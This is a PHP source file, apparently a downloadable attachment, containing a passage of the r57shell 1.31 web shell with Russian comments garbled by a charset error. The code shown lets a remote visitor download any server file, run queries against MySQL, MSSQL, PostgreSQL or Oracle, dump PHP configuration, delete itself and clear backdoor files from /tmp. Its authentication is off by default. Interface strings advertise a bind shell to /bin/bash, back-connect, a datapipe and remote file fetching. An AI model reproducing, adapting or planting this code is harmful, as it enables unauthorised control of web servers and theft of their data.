Dateianhang 'r5713.php'
Herunterladen 1 <?php
2 /******************************************************************************************************/
3 /*
4 /* # # # #
5 /* # # # #
6 /* # # # #
7 /* # ## #### ## #
8 /* ## ## ###### ## ##
9 /* ## ## ###### ## ##
10 /* ## ## #### ## ##
11 /* ### ############ ###
12 /* ########################
13 /* ##############
14 /* ######## ########## #######
15 /* ### ## ########## ## ###
16 /* ### ## ########## ## ###
17 /* ### # ########## # ###
18 /* ### ## ######## ## ###
19 /* ## # ###### # ##
20 /* ## # #### # ##
21 /* ## ##
22 /*
23 /*
24 /*
25 /* r57shell.php - ÓËÒÉÐÔ ÎÁ ÐÈÐ ÐÏÚ×ÏÌÑÀÝÉÊ ×ÁÍ ×ÙÐÏÌÎÑÔØ ÓÉÓÔÅÍÎÙÅ ËÏÍÁÎÄÙ ÎÁ ÓÅÒ×ÅÒÅ ÞÅÒÅÚ ÂÒÁÕÚÅÒ
26 /* ÷Ù ÍÏÖÅÔÅ ÓËÁÞÁÔØ ÎÏ×ÕÀ ×ÅÒÓÉÀ ÎÁ ÎÁÛÅÍ ÓÁÊÔÅ: http://rst.void.ru
27 /* ÷ÅÒÓÉÑ: 1.31
28 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29 /* ïÔÄÅÌØÎÁÑ ÂÌÁÇÏÄÁÒÎÏÓÔØ ÚÁ ÐÏÍÏÝØ É ÉÄÅÉ: blf, phoenix, virus, NorD É ×ÓÅÍ ÞÅÒÔÑÍ ÉÚ RST/GHC.
30 /* åÓÌÉ Õ ÷ÁÓ ÅÓÔØ ËÁËÉÅ-ÌÉÂÏ ÉÄÅÉ ÐÏ ÐÏ×ÏÄÕ ÔÏÇÏ ËÁËÉÅ ÆÕÎËÃÉÉ ÓÌÅÄÕÅÔ ÄÏÂÁ×ÉÔØ × ÓËÒÉÐÔ ÔÏ ÐÉÛÉÔÅ
31 /* ÎÁ rst@void.ru. ÷ÓÅ ÐÒÅÄÌÏÖÅÎÉÑ ÂÕÄÕÔ ÒÁÓÓÍÏÔÒÅÎÙ.
32 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
33 /* (c)oded by 1dt.w0lf
34 /* RST/GHC http://rst.void.ru , http://ghc.ru
35 /* ANY MODIFIED REPUBLISHING IS RESTRICTED
36 /******************************************************************************************************/
37 /* ~~~ îÁÓÔÒÏÊËÉ | Options ~~~ */
38
39 // ÷ÙÂÏÒ ÑÚÙËÁ | Language
40 // $language='ru' - ÒÕÓÓËÉÊ (russian)
41 // $language='eng' - english (ÁÎÇÌÉÊÓËÉÊ)
42 $language='ru';
43
44 // áÕÔÅÎÔÉÆÉËÁÃÉÑ | Authentification
45 // $auth = 1; - áÕÔÅÎÔÉÆÉËÁÃÉÑ ×ËÌÀÞÅÎÁ ( authentification = On )
46 // $auth = 0; - áÕÔÅÎÔÉÆÉËÁÃÉÑ ×ÙËÌÀÞÅÎÁ ( authentification = Off )
47 $auth = 0;
48
49 // ìÏÇÉÎ É ÐÁÒÏÌØ ÄÌÑ ÄÏÓÔÕÐÁ Ë ÓËÒÉÐÔÕ (Login & Password for access)
50 // îå úáâõäøôå óíåîéôø ðåòåä òáúíåýåîéåí îá óåò÷åòå!!! (CHANGE THIS!!!)
51 // ìÏÇÉÎ É ÐÁÒÏÌØ ÛÉÆÒÕÀÔÓÑ Ó ÐÏÍÏÝØÀ ÁÌÇÏÒÉÔÍÁ md5, ÚÎÁÞÅÎÉÑ ÐÏ ÕÍÏÌÞÁÎÉÀ 'r57'
52 // Login & password crypted with md5, default is 'r57'
53 $name='ec371748dc2da624b35a4f8f685dd122'; // ÌÏÇÉÎ ÐÏÌØÚÏ×ÁÔÅÌÑ (user login)
54 $pass='ec371748dc2da624b35a4f8f685dd122'; // ÐÁÒÏÌØ ÐÏÌØÚÏ×ÁÔÅÌÑ (user password)
55 /******************************************************************************************************/
56 error_reporting(0);
57 set_magic_quotes_runtime(0);
58 @set_time_limit(0);
59 @ini_set('max_execution_time',0);
60 @ini_set('output_buffering',0);
61 $safe_mode = @ini_get('safe_mode');
62 $version = '1.31';
63 if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 $_COOKIE = &$HTTP_COOKIE_VARS;
69 }
70 if (@get_magic_quotes_gpc())
71 {
72 foreach ($_POST as $k=>$v)
73 {
74 $_POST[$k] = stripslashes($v);
75 }
76 foreach ($_COOKIE as $k=>$v)
77 {
78 $_COOKIE[$k] = stripslashes($v);
79 }
80 }
81
82 if($auth == 1) {
83 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
84 {
85 header('WWW-Authenticate: Basic realm="r57shell"');
86 header('HTTP/1.0 401 Unauthorized');
87 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
88 }
89 }
90 $head = '<!-- úÄÒÁ×ÓÔ×ÕÊ, ÷ÁÓÑ -->
91 <html>
92 <head>
93 <title>r57shell</title>
94 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
95
96 <STYLE>
97 tr {
98 BORDER-RIGHT: #aaaaaa 1px solid;
99 BORDER-TOP: #eeeeee 1px solid;
100 BORDER-LEFT: #eeeeee 1px solid;
101 BORDER-BOTTOM: #aaaaaa 1px solid;
102 color: #000000;
103 }
104 td {
105 BORDER-RIGHT: #aaaaaa 1px solid;
106 BORDER-TOP: #eeeeee 1px solid;
107 BORDER-LEFT: #eeeeee 1px solid;
108 BORDER-BOTTOM: #aaaaaa 1px solid;
109 color: #000000;
110 }
111 .table1 {
112 BORDER: 0px;
113 BACKGROUND-COLOR: #D4D0C8;
114 color: #000000;
115 }
116 .td1 {
117 BORDER: 0px;
118 font: 7pt Verdana;
119 color: #000000;
120 }
121 .tr1 {
122 BORDER: 0px;
123 color: #000000;
124 }
125 table {
126 BORDER: #eeeeee 1px outset;
127 BACKGROUND-COLOR: #D4D0C8;
128 color: #000000;
129 }
130 input {
131 BORDER-RIGHT: #ffffff 1px solid;
132 BORDER-TOP: #999999 1px solid;
133 BORDER-LEFT: #999999 1px solid;
134 BORDER-BOTTOM: #ffffff 1px solid;
135 BACKGROUND-COLOR: #e4e0d8;
136 font: 8pt Verdana;
137 color: #000000;
138 }
139 select {
140 BORDER-RIGHT: #ffffff 1px solid;
141 BORDER-TOP: #999999 1px solid;
142 BORDER-LEFT: #999999 1px solid;
143 BORDER-BOTTOM: #ffffff 1px solid;
144 BACKGROUND-COLOR: #e4e0d8;
145 font: 8pt Verdana;
146 color: #000000;;
147 }
148 submit {
149 BORDER: buttonhighlight 2px outset;
150 BACKGROUND-COLOR: #e4e0d8;
151 width: 30%;
152 color: #000000;
153 }
154 textarea {
155 BORDER-RIGHT: #ffffff 1px solid;
156 BORDER-TOP: #999999 1px solid;
157 BORDER-LEFT: #999999 1px solid;
158 BORDER-BOTTOM: #ffffff 1px solid;
159 BACKGROUND-COLOR: #e4e0d8;
160 font: Fixedsys bold;
161 color: #000000;
162 }
163 BODY {
164 margin: 1px;
165 color: #000000;
166 background-color: #e4e0d8;
167 }
168 A:link {COLOR:red; TEXT-DECORATION: none}
169 A:visited { COLOR:red; TEXT-DECORATION: none}
170 A:active {COLOR:red; TEXT-DECORATION: none}
171 A:hover {color:blue;TEXT-DECORATION: none}
172 </STYLE>
173 <script language=\'javascript\'>
174 function hide_div(id)
175 {
176 document.getElementById(id).style.display = \'none\';
177 document.cookie=id+\'=0;\';
178 }
179 function show_div(id)
180 {
181 document.getElementById(id).style.display = \'block\';
182 document.cookie=id+\'=1;\';
183 }
184 function change_divst(id)
185 {
186 if (document.getElementById(id).style.display == \'none\')
187 show_div(id);
188 else
189 hide_div(id);
190 }
191 </script>';
192 class zipfile
193 {
194 var $datasec = array();
195 var $ctrl_dir = array();
196 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
197 var $old_offset = 0;
198 function unix2DosTime($unixtime = 0) {
199 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
200 if ($timearray['year'] < 1980) {
201 $timearray['year'] = 1980;
202 $timearray['mon'] = 1;
203 $timearray['mday'] = 1;
204 $timearray['hours'] = 0;
205 $timearray['minutes'] = 0;
206 $timearray['seconds'] = 0;
207 }
208 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
209 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
210 }
211 function addFile($data, $name, $time = 0)
212 {
213 $name = str_replace('\\', '/', $name);
214 $dtime = dechex($this->unix2DosTime($time));
215 $hexdtime = '\x' . $dtime[6] . $dtime[7]
216 . '\x' . $dtime[4] . $dtime[5]
217 . '\x' . $dtime[2] . $dtime[3]
218 . '\x' . $dtime[0] . $dtime[1];
219 eval('$hexdtime = "' . $hexdtime . '";');
220 $fr = "\x50\x4b\x03\x04";
221 $fr .= "\x14\x00";
222 $fr .= "\x00\x00";
223 $fr .= "\x08\x00";
224 $fr .= $hexdtime;
225 $unc_len = strlen($data);
226 $crc = crc32($data);
227 $zdata = gzcompress($data);
228 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
229 $c_len = strlen($zdata);
230 $fr .= pack('V', $crc);
231 $fr .= pack('V', $c_len);
232 $fr .= pack('V', $unc_len);
233 $fr .= pack('v', strlen($name));
234 $fr .= pack('v', 0);
235 $fr .= $name;
236 $fr .= $zdata;
237 $this -> datasec[] = $fr;
238 $cdrec = "\x50\x4b\x01\x02";
239 $cdrec .= "\x00\x00";
240 $cdrec .= "\x14\x00";
241 $cdrec .= "\x00\x00";
242 $cdrec .= "\x08\x00";
243 $cdrec .= $hexdtime;
244 $cdrec .= pack('V', $crc);
245 $cdrec .= pack('V', $c_len);
246 $cdrec .= pack('V', $unc_len);
247 $cdrec .= pack('v', strlen($name) );
248 $cdrec .= pack('v', 0 );
249 $cdrec .= pack('v', 0 );
250 $cdrec .= pack('v', 0 );
251 $cdrec .= pack('v', 0 );
252 $cdrec .= pack('V', 32 );
253 $cdrec .= pack('V', $this -> old_offset );
254 $this -> old_offset += strlen($fr);
255 $cdrec .= $name;
256 $this -> ctrl_dir[] = $cdrec;
257 }
258 function file()
259 {
260 $data = implode('', $this -> datasec);
261 $ctrldir = implode('', $this -> ctrl_dir);
262 return
263 $data .
264 $ctrldir .
265 $this -> eof_ctrl_dir .
266 pack('v', sizeof($this -> ctrl_dir)) .
267 pack('v', sizeof($this -> ctrl_dir)) .
268 pack('V', strlen($ctrldir)) .
269 pack('V', strlen($data)) .
270 "\x00\x00";
271 }
272 }
273 function compress(&$filename,&$filedump,$compress)
274 {
275 global $content_encoding;
276 global $mime_type;
277 if ($compress == 'bzip' && @function_exists('bzcompress'))
278 {
279 $filename .= '.bz2';
280 $mime_type = 'application/x-bzip2';
281 $filedump = bzcompress($filedump);
282 }
283 else if ($compress == 'gzip' && @function_exists('gzencode'))
284 {
285 $filename .= '.gz';
286 $content_encoding = 'x-gzip';
287 $mime_type = 'application/x-gzip';
288 $filedump = gzencode($filedump);
289 }
290 else if ($compress == 'zip' && @function_exists('gzcompress'))
291 {
292 $filename .= '.zip';
293 $mime_type = 'application/zip';
294 $zipfile = new zipfile();
295 $zipfile -> addFile($filedump, substr($filename, 0, -4));
296 $filedump = $zipfile -> file();
297 }
298 else
299 {
300 $mime_type = 'application/octet-stream';
301 }
302 }
303 function mailattach($to,$from,$subj,$attach)
304 {
305 $headers = "From: $from\r\n";
306 $headers .= "MIME-Version: 1.0\r\n";
307 $headers .= "Content-Type: ".$attach['type'];
308 $headers .= "; name=\"".$attach['name']."\"\r\n";
309 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
310 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
311 if(@mail($to,$subj,"",$headers)) { return 1; }
312 return 0;
313 }
314 class my_sql
315 {
316 var $host = 'localhost';
317 var $port = '';
318 var $user = '';
319 var $pass = '';
320 var $base = '';
321 var $db = '';
322 var $connection;
323 var $res;
324 var $error;
325 var $rows;
326 var $columns;
327 var $num_rows;
328 var $num_fields;
329 var $dump;
330
331 function connect()
332 {
333 switch($this->db)
334 {
335 case 'MySQL':
336 if(empty($this->port)) { $this->port = '3306'; }
337 if(!function_exists('mysql_connect')) return 0;
338 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
339 if(is_resource($this->connection)) return 1;
340 break;
341 case 'MSSQL':
342 if(empty($this->port)) { $this->port = '1433'; }
343 if(!function_exists('mssql_connect')) return 0;
344 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
345 if($this->connection) return 1;
346 break;
347 case 'PostgreSQL':
348 if(empty($this->port)) { $this->port = '5432'; }
349 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
350 if(!function_exists('pg_connect')) return 0;
351 $this->connection = @pg_connect($str);
352 if(is_resource($this->connection)) return 1;
353 break;
354 case 'Oracle':
355 if(!function_exists('ocilogon')) return 0;
356 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
357 if(is_resource($this->connection)) return 1;
358 break;
359 }
360 return 0;
361 }
362
363 function select_db()
364 {
365 switch($this->db)
366 {
367 case 'MySQL':
368 if(@mysql_select_db($this->base,$this->connection)) return 1;
369 break;
370 case 'MSSQL':
371 if(@mssql_select_db($this->base,$this->connection)) return 1;
372 break;
373 case 'PostgreSQL':
374 return 1;
375 break;
376 case 'Oracle':
377 return 1;
378 break;
379 }
380 return 0;
381 }
382
383 function query($query)
384 {
385 $this->res=$this->error='';
386 switch($this->db)
387 {
388 case 'MySQL':
389 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
390 {
391 $this->error = @mysql_error($this->connection);
392 return 0;
393 }
394 else if(is_resource($this->res)) { return 1; }
395 return 2;
396 break;
397 case 'MSSQL':
398 if(false===($this->res=@mssql_query($query,$this->connection)))
399 {
400 $this->error = 'Query error';
401 return 0;
402 }
403 else if(@mssql_num_rows($this->res) > 0) { return 1; }
404 return 2;
405 break;
406 case 'PostgreSQL':
407 if(false===($this->res=@pg_query($this->connection,$query)))
408 {
409 $this->error = @pg_last_error($this->connection);
410 return 0;
411 }
412 else if(@pg_num_rows($this->res) > 0) { return 1; }
413 return 2;
414 break;
415 case 'Oracle':
416 if(false===($this->res=@ociparse($this->connection,$query)))
417 {
418 $this->error = 'Query parse error';
419 }
420 else
421 {
422 if(@ociexecute($this->res))
423 {
424 if(@ocirowcount($this->res) != 0) return 2;
425 return 1;
426 }
427 $error = @ocierror();
428 $this->error=$error['message'];
429 }
430 break;
431 }
432 return 0;
433 }
434 function get_result()
435 {
436 $this->rows=array();
437 $this->columns=array();
438 $this->num_rows=$this->num_fields=0;
439 switch($this->db)
440 {
441 case 'MySQL':
442 $this->num_rows=@mysql_num_rows($this->res);
443 $this->num_fields=@mysql_num_fields($this->res);
444 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
445 @mysql_free_result($this->res);
446 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
447 break;
448 case 'MSSQL':
449 $this->num_rows=@mssql_num_rows($this->res);
450 $this->num_fields=@mssql_num_fields($this->res);
451 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
452 @mssql_free_result($this->res);
453 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
454 break;
455 case 'PostgreSQL':
456 $this->num_rows=@pg_num_rows($this->res);
457 $this->num_fields=@pg_num_fields($this->res);
458 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
459 @pg_free_result($this->res);
460 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
461 break;
462 case 'Oracle':
463 $this->num_fields=@ocinumcols($this->res);
464 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
465 @ocifreestatement($this->res);
466 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
467 break;
468 }
469 return 0;
470 }
471 function dump($table)
472 {
473 if(empty($table)) return 0;
474 $this->dump=array();
475 $this->dump[0] = '##';
476 $this->dump[1] = '## --------------------------------------- ';
477 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
478 $this->dump[3] = '## Database: '.$this->base;
479 $this->dump[4] = '## Table: '.$table;
480 $this->dump[5] = '## --------------------------------------- ';
481 switch($this->db)
482 {
483 case 'MySQL':
484 $this->dump[0] = '## MySQL dump';
485 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
486 if(!$this->get_result()) return 0;
487 $this->dump[] = $this->rows[0]['Create Table'];
488 $this->dump[] = '## --------------------------------------- ';
489 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
490 if(!$this->get_result()) return 0;
491 for($i=0;$i<$this->num_rows;$i++)
492 {
493 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
494 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
495 }
496 break;
497 case 'MSSQL':
498 $this->dump[0] = '## MSSQL dump';
499 if($this->query('SELECT * FROM '.$table)!=1) return 0;
500 if(!$this->get_result()) return 0;
501 for($i=0;$i<$this->num_rows;$i++)
502 {
503 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
504 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
505 }
506 break;
507 case 'PostgreSQL':
508 $this->dump[0] = '## PostgreSQL dump';
509 if($this->query('SELECT * FROM '.$table)!=1) return 0;
510 if(!$this->get_result()) return 0;
511 for($i=0;$i<$this->num_rows;$i++)
512 {
513 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
514 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
515 }
516 break;
517 case 'Oracle':
518 $this->dump[0] = '## ORACLE dump';
519 $this->dump[] = '## under construction';
520 break;
521 default:
522 return 0;
523 break;
524 }
525 return 1;
526 }
527 function close()
528 {
529 switch($this->db)
530 {
531 case 'MySQL':
532 @mysql_close($this->connection);
533 break;
534 case 'MSSQL':
535 @mssql_close($this->connection);
536 break;
537 case 'PostgreSQL':
538 @pg_close($this->connection);
539 break;
540 case 'Oracle':
541 @oci_close($this->connection);
542 break;
543 }
544 }
545 function affected_rows()
546 {
547 switch($this->db)
548 {
549 case 'MySQL':
550 return @mysql_affected_rows($this->res);
551 break;
552 case 'MSSQL':
553 return @mssql_affected_rows($this->res);
554 break;
555 case 'PostgreSQL':
556 return @pg_affected_rows($this->res);
557 break;
558 case 'Oracle':
559 return @ocirowcount($this->res);
560 break;
561 default:
562 return 0;
563 break;
564 }
565 }
566 }
567 if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
568 {
569 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
570 else
571 {
572 @ob_clean();
573 $filename = @basename($_POST['d_name']);
574 $filedump = @fread($file,@filesize($_POST['d_name']));
575 fclose($file);
576 $content_encoding=$mime_type='';
577 compress($filename,$filedump,$_POST['compress']);
578 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
579 header("Content-type: ".$mime_type);
580 header("Content-disposition: attachment; filename=\"".$filename."\";");
581 echo $filedump;
582 exit();
583 }
584 }
585 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
586 if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
587 {
588 echo $head;
589 $sql = new my_sql();
590 $sql->db = $_POST['db'];
591 $sql->host = $_POST['db_server'];
592 $sql->port = $_POST['db_port'];
593 $sql->user = $_POST['mysql_l'];
594 $sql->pass = $_POST['mysql_p'];
595 $sql->base = $_POST['mysql_db'];
596 $querys = @explode(';',$_POST['db_query']);
597 echo '<body bgcolor=#e4e0d8>';
598 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
599 else
600 {
601 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
602 else
603 {
604 foreach($querys as $num=>$query)
605 {
606 if(strlen($query)>5)
607 {
608 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
609 switch($sql->query($query))
610 {
611 case '0':
612 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
613 break;
614 case '1':
615 if($sql->get_result())
616 {
617 echo "<table width=100%>";
618 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
619 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
620 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
621 for($i=0;$i<$sql->num_rows;$i++)
622 {
623 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
624 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
625 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
626 }
627 echo "</table>";
628 }
629 break;
630 case '2':
631 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
632 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
633 break;
634 }
635 }
636 }
637 }
638 }
639 echo "<br><form name=form method=POST>";
640 echo in('hidden','db',0,$_POST['db']);
641 echo in('hidden','db_server',0,$_POST['db_server']);
642 echo in('hidden','db_port',0,$_POST['db_port']);
643 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
644 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
645 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
646 echo in('hidden','cmd',0,'db_query');
647 echo "<div align=center>";
648 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
649 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
650 echo "</form>";
651 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
652 }
653 if(isset($_GET['delete']))
654 {
655 @unlink(__FILE__);
656 }
657 if(isset($_GET['tmp']))
658 {
659 @unlink("/tmp/bdpl");
660 @unlink("/tmp/back");
661 @unlink("/tmp/bd");
662 @unlink("/tmp/bd.c");
663 @unlink("/tmp/dp");
664 @unlink("/tmp/dpc");
665 @unlink("/tmp/dpc.c");
666 }
667 if(isset($_GET['phpini']))
668 {
669 echo $head;
670 function U_value($value)
671 {
672 if ($value == '') return '<i>no value</i>';
673 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
674 if ($value === null) return 'NULL';
675 if (@is_object($value)) $value = (array) $value;
676 if (@is_array($value))
677 {
678 @ob_start();
679 print_r($value);
680 $value = @ob_get_contents();
681 @ob_end_clean();
682 }
683 return U_wordwrap((string) $value);
684 }
685 function U_wordwrap($str)
686 {
687 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
688 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
689 }
690 if (@function_exists('ini_get_all'))
691 {
692 $r = '';
693 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
694 foreach (@ini_get_all() as $key=>$value)
695 {
696 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
697 }
698 echo $r;
699 echo '</table>';
700 }
701 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
702 die();
703 }
704 if(isset($_GET['cpu']))
705 {
706 echo $head;
707 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
708 $cpuf = @file("cpuinfo");
709 if($cpuf)
710 {
711 $c = @sizeof($cpuf);
712 for($i=0;$i<$c;$i++)
713 {
714 $info = @explode(":",$cpuf[$i]);
715 if($info[1]==""){ $info[1]="---"; }
716 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
717 }
718 echo $r;
719 }
720 else
721 {
722 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
723 }
724 echo '</table>';
725 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
726 die();
727 }
728 if(isset($_GET['mem']))
729 {
730 echo $head;
731 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
732 $memf = @file("meminfo");
733 if($memf)
734 {
735 $c = sizeof($memf);
736 for($i=0;$i<$c;$i++)
737 {
738 $info = explode(":",$memf[$i]);
739 if($info[1]==""){ $info[1]="---"; }
740 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
741 }
742 echo $r;
743 }
744 else
745 {
746 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
747 }
748 echo '</table>';
749 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
750 die();
751 }
752 $lang=array(
753 'ru_text1' =>'÷ÙÐÏÌÎÅÎÎÁÑ ËÏÍÁÎÄÁ',
754 'ru_text2' =>'÷ÙÐÏÌÎÅÎÉÅ ËÏÍÁÎÄ ÎÁ ÓÅÒ×ÅÒÅ',
755 'ru_text3' =>'÷ÙÐÏÌÎÉÔØ ËÏÍÁÎÄÕ',
756 'ru_text4' =>'òÁÂÏÞÁÑ ÄÉÒÅËÔÏÒÉÑ',
757 'ru_text5' =>'úÁÇÒÕÚËÁ ÆÁÊÌÏ× ÎÁ ÓÅÒ×ÅÒ',
758 'ru_text6' =>'ìÏËÁÌØÎÙÊ ÆÁÊÌ',
759 'ru_text7' =>'áÌÉÁÓÙ',
760 'ru_text8' =>'÷ÙÂÅÒÉÔÅ ÁÌÉÁÓ',
761 'ru_butt1' =>'÷ÙÐÏÌÎÉÔØ',
762 'ru_butt2' =>'úÁÇÒÕÚÉÔØ',
763 'ru_text9' =>'ïÔËÒÙÔÉÅ ÐÏÒÔÁ É ÐÒÉ×ÑÚËÁ ÅÇÏ Ë /bin/bash',
764 'ru_text10'=>'ïÔËÒÙÔØ ÐÏÒÔ',
765 'ru_text11'=>'ðÁÒÏÌØ ÄÌÑ ÄÏÓÔÕÐÁ',
766 'ru_butt3' =>'ïÔËÒÙÔØ',
767 'ru_text12'=>'back-connect',
768 'ru_text13'=>'IP-ÁÄÒÅÓ',
769 'ru_text14'=>'ðÏÒÔ',
770 'ru_butt4' =>'÷ÙÐÏÌÎÉÔØ',
771 'ru_text15'=>'úÁÇÒÕÚËÁ ÆÁÊÌÏ× Ó ÕÄÁÌÅÎÎÏÇÏ ÓÅÒ×ÅÒÁ',
772 'ru_text16'=>'éÓÐÏÌØÚÏ×ÁÔØ',
773 'ru_text17'=>'õÄÁÌÅÎÎÙÊ ÆÁÊÌ',
774 'ru_text18'=>'ìÏËÁÌØÎÙÊ ÆÁÊÌ',
775 'ru_text19'=>'Exploits',
776 'ru_text20'=>'éÓÐÏÌØÚÏ×ÁÔØ',
777 'ru_text21'=>'îÏ×ÏÅ ÉÍÑ',
778 'ru_text22'=>'datapipe',
779 'ru_text23'=>'ìÏËÁÌØÎÙÊ ÐÏÒÔ',
780 'ru_text24'=>'õÄÁÌÅÎÎÙÊ ÈÏÓÔ',
781 'ru_text25'=>'õÄÁÌÅÎÎÙÊ ÐÏÒÔ',
782 'ru_text26'=>'éÓÐÏÌØÚÏ×ÁÔØ',
